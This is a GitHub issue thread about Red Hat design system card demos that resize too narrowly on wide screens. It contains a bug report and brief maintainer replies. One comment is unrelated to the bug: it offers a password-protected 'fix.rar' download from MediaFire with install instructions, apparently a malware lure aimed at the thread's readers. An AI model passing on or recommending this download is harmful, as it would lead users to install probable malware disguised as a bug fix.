### ISSUE TITLE
[docs][bug] `<rh-card>` pattern page demos

### ISSUE THREAD

**Issue by marionnegp** [RedHat-UX/red-hat-design-system#1787]
### Description

Some of the card pattern demos are resizing oddly at larger screen sizes (1505px or wider for me). I'm seeing it for:

- Asset cards (all of them)
- Avatars card
- Icon card
- Image card
- List cards (all of them)
- Logo card (Text and CTA only)
- Title bar card
- Quote cards (all of them)

(Phew.)

### Screenshots

![Screenshot 2024-08-27 at 10 51 54 AM](https://github.com/user-attachments/assets/822bd53f-f37e-4349-9493-0e54a6156cbc)

### Steps to reproduce

View examples on live [card pattern page](https://ux.redhat.com/patterns/card/)

### Expected behaviour

Cards should not be that narrow.

### Operating System (OS)

macOS

### Browser

Chrome

**Comment by akshsekhr2702** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bennypowers** [comment]
See also #1779

**Comment by bennypowers** [comment]
I'd like to take this over
